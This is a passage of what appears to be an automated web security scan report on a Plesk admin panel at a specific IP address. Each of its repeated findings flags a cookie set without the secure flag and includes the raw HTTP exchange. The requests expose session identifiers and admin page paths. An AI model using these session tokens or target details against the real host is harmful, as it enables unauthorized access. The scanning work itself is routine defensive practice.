Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/interface/locale@multi/disable/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/interface/locale@multi/disable/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:48:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:48:34 GMT
Connection: close
Content-Length: 21554

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.118. https://50.22.21.242:8443/plesk/server/interface/templates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/interface/templates/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/interface/templates/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/server/interface/uimodes@/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:47:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:47:45 GMT
Connection: close
Content-Length: 16808

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.119. https://50.22.21.242:8443/plesk/server/interface/uimodes@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/interface/uimodes@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/interface/uimodes@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Finterface%2Fuimodes%40%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:47:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:47:12 GMT
Connection: close
Content-Length: 17527

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.120. https://50.22.21.242:8443/plesk/server/mail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/mail/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/mail/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Fmail%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:37:49 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:37:49 GMT
Connection: close
Content-Length: 31577

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.121. https://50.22.21.242:8443/plesk/server/preferences/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/preferences/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/preferences/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:59:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:59:36 GMT
Content-Length: 19292

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.122. https://50.22.21.242:8443/plesk/server/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/services/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/services/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Fservices%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:20 GMT
Connection: close
Content-Length: 70196

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.123. https://50.22.21.242:8443/plesk/server/statistics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/statistics/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/statistics/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:33:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:33:52 GMT
Content-Length: 18930

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.124. https://50.22.21.242:8443/plesk/server/tsclient/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/tsclient/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/tsclient/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Ftsclient%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:02:38 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:02:37 GMT
Connection: close
Content-Length: 16293

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.125. https://50.22.21.242:8443/plesk/sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/sessions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/sessions/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:48 GMT
Content-Length: 27654

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.126. https://50.22.21.242:8443/plesk/sessions/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/sessions/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/sessions/properties/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:26:28 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:26:28 GMT
Content-Length: 16817

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.127. https://50.22.21.242:8443/plesk/ts-sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/ts-sessions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/ts-sessions/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/sessions/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:28 GMT
Connection: close
Content-Length: 27434

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.128. https://50.22.21.242:8443/server/cp_access_add_edit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /server/cp_access_add_edit.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/cp_access_add_edit.php?id=0 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/cp-access/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:08:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:08:55 GMT
Connection: close
Content-Length: 15817

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.129. https://50.22.21.242:8443/server/firewall.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /server/firewall.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/firewall.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/server/firewall/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:49:06 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:49:08 GMT
Connection: close
Content-Length: 26344

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.130. https://50.22.21.242:8443/server/firewall_icmp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /server/firewall_icmp.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/firewall_icmp.php HTTP/1.1
Host: 50.22.21.242:8443
